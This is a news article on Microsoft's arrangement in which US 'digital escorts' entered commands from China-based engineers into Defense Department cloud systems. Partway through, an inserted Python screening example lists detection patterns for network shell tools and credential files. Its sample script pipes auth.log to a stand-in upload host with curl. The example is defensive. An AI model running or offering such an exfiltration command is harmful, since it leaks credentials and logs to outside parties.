On July 15, it was revealed that Microsoft had for nearly a decade used Chinese engineers to remotely maintain U.S. Department of Defense computer systems, with "digital escorts" of limited technical ability executing the instructions on their behalf, allowing Chinese hackers to take advantage of the situation. After the news broke, U.S. Secretary of Defense Pete Hegseth said that a two-week investigation had been launched into the matter.

The "Digital Escort" system came to light only after a decade, and even the Department of Defense did not know about it

This system originated ten years ago. To win the U.S. government cloud contract, Microsoft proposed a "compromise plan": overseas engineers from China and other countries would be responsible for maintaining the technology, and American personnel holding U.S. Department of Defense security clearances would input commands on their behalf. They were called "Digital Escorts."

Microsoft outsourced the recruitment of escorts to Insight Global and ASM Research. Most of the escorts are veterans or hold only a security clearance. Their hourly wages start at $18. Their technical skills are limited, and they cannot tell whether a program is malicious. A current escort revealed:

"We have to handle hundreds of requests from Chinese engineers every month, and we have to prevent data from being "leaked", but technical training can't make up for the gap. Even if suspicious instructions are discovered, it is actually impossible to see afterwards. We can only believe that these engineers did not do anything bad."

This system has been in operation for many years and has kept a low profile. Even the U.S. Defense Information Systems Agency (DISA) said that "no one knows about this."

Chinese hacker threats continue, experts say it's more dangerous than TikTok

The Office of the Director of National Intelligence (ODNI) has always regarded China as the most active source of hacker threats. In 2023, Chinese hackers even hacked into the cloud mailboxes of senior US government officials and stole 60,000 State Department emails.

Harry Coker, a former CIA and NSA executive, said after seeing the escort system:

"If I were a Chinese intelligence agent, this would be a perfect opportunity for infiltration."

He stressed that this is much more serious than the espionage concerns about TikTok or Chinese students. John Sherman, former chief information officer of the Department of Defense, was also surprised to hear about this:

"I should have known about this, and DISA and the U.S. Cyber Command should review it."

Some experts have warned that Chinese law allows the government to obtain data from companies or citizens as long as it is deemed to be for "legitimate purposes." In other words, Microsoft employees in China may be asked to provide information to intelligence agencies at any time, rendering the escort system's protections meaningless.

How does the escort system work?

The "digital escort" process works as follows:

  1. Chinese engineers file a maintenance request: Microsoft engineers in China open a request document for work such as firewall maintenance or checking system records.

  2. U.S. digital escorts receive the request: the U.S.-based escorts hold meetings and discussions with the Chinese engineers.

  3. The escorts copy the instructions: the Chinese engineers give the computer commands to the escorts, who then enter them directly into the Department of Defense's cloud system.

  4. The escort cannot assess what the code does: if a script is called "fix_servers.sh" but is actually a malicious program, the escort will not be able to tell.

Matthew Erickson, a Microsoft engineer who participated in the design of the system, admitted that the escorts only "know a little bit of technology" at most, and the real maintenance work still has to rely on overseas engineers. The escorts only ensure that overseas engineers cannot see passwords or personal information.
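Step 4 is the weak point: the escort sees a filename and a request, not what the commands do. As an added illustration (not from the original article and not Microsoft's tooling), the Python below triages a submitted script against the declared scope of its request and lists constructs to escalate to a qualified reviewer. The request types, allowed-command table, patterns and sample script are constructed assumptions.

```python
import re

# Constructed scope table: request types echo the article's examples (firewall
# maintenance, checking system records); the allowed commands are assumptions.
ALLOWED = {
    "firewall-maintenance": {"iptables", "nft", "systemctl", "echo"},
    "log-review": {"grep", "journalctl", "tail", "cat", "echo"},
}
# Constructs escalated to a qualified reviewer regardless of request type.
RISKY = [
    (r"\b(curl|wget|nc|ncat|scp|ssh)\b", "network transfer or remote shell"),
    (r"\bbase64\b.*(-d|--decode)", "decodes an embedded payload"),
    (r"\|\s*(ba)?sh\b", "pipes data into a shell"),
    (r"\beval\b", "evaluates a constructed string"),
    (r"/etc/shadow|\.ssh/|id_rsa", "touches credential material"),
]

def review(script: str, ticket_type: str) -> list[str]:
    """Return findings; an empty list means nothing was flagged, not 'safe'."""
    findings, allowed = [], ALLOWED.get(ticket_type, set())
    for n, line in enumerate(script.splitlines(), 1):
        code = line.split("#", 1)[0].strip()  # drop comments and the shebang
        if not code:
            continue
        for pattern, why in RISKY:
            if re.search(pattern, code):
                findings.append(f"line {n}: {why}")
        # The first word of every pipeline/sequence segment must be in scope.
        for segment in re.split(r"\|\||&&|[|;]", code):
            words = segment.split()
            if words and words[0] not in allowed:
                findings.append(f"line {n}: '{words[0]}' outside {ticket_type} scope")
    return findings

# Constructed sample: named like the article's fix_servers.sh, filed as log review.
FIX_SERVERS_SH = """\
#!/bin/sh
# rotate and check logs
tail -n 50 /var/log/syslog
grep -i error /var/log/syslog | tail -n 5
cat /var/log/auth.log | curl -s -T - https://upload.example.invalid/
"""
```

The filename never enters the decision; anything flagged goes to a reviewer who can read the script before an escort runs it.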

Why is there such a system?

The U.S. Department of Defense stipulates that people who handle sensitive information must be U.S. citizens or green card holders. However, Microsoft's team is spread all over the world, with a large number of engineers in China, India, and Europe. It is too costly to temporarily hire a large number of American engineers.

At that time, Microsoft's "FedRAMP lobbyist" Indy Crowley lobbied the government, saying that the cloud maintenance risk was no greater than that of other government suppliers. The Department of Defense once asked Microsoft to simply hire American engineers directly, but Crowley refused because the cost would make the government's cloud transformation prohibitively expensive. In the end, Microsoft adopted the escort system as the most cost-effective and labor-saving solution, which could meet the Department of Defense's regulations without spending a lot of money.

(Note: FedRAMP is a standardized program promoted by the U.S. federal government that provides a unified security assessment, authorization, and continuous monitoring mechanism for cloud products and services used by government agencies to ensure that these cloud services meet security standards.)

Insiders warned, but were ignored by top management

Some people within Microsoft opposed the system, believing that the security risks were too high, but Tom Keane, then head of the cloud platform, pushed for it because it would help expand the business quickly. Those who opposed it eventually left, and the escort system was put into place. After that, Microsoft security executives warned that the escort system had loopholes: overseas engineers could learn the details of the U.S. federal cloud, while the escorts could not find any problems at all. These warnings still did not change the company's decision.

Microsoft says it no longer uses Chinese engineers to support defense systems

After the controversy was exposed, Microsoft claimed that it did not allow its Chinese engineers to "directly contact the national defense system" and that they only provided instructions. It said the escorts had complete technical training and worked in conjunction with monitoring. The company also emphasized that there was an internal review process called "Lockbox", but the details were not disclosed.

Microsoft President Brad Smith also mentioned at a Senate hearing in May that the company was "removing Chinese nationals from government agencies," but did not explain how they gained access to these systems in the first place. Microsoft spokesman Frank Shaw also posted on X on July 19:

"No Chinese engineers will provide technical assistance to the U.S. defense cloud and related services."

U.S. Secretary of Defense Pete Hegseth also posted on X on July 19 regarding this matter:

"We will launch a two-week investigation to ensure that Chinese engineers are completely withdrawn from the Department of Defense's cloud services and that Chinese nationals are no longer allowed to participate. We will also continue to monitor and counter military infrastructure and cyber threats."

This article, "Does the U.S. military rely on Chinese engineers for remote maintenance of its cloud? Microsoft's 'Digital Guard' is targeted by the U.S. Department of Defense", first appeared in Chain News ABMedia.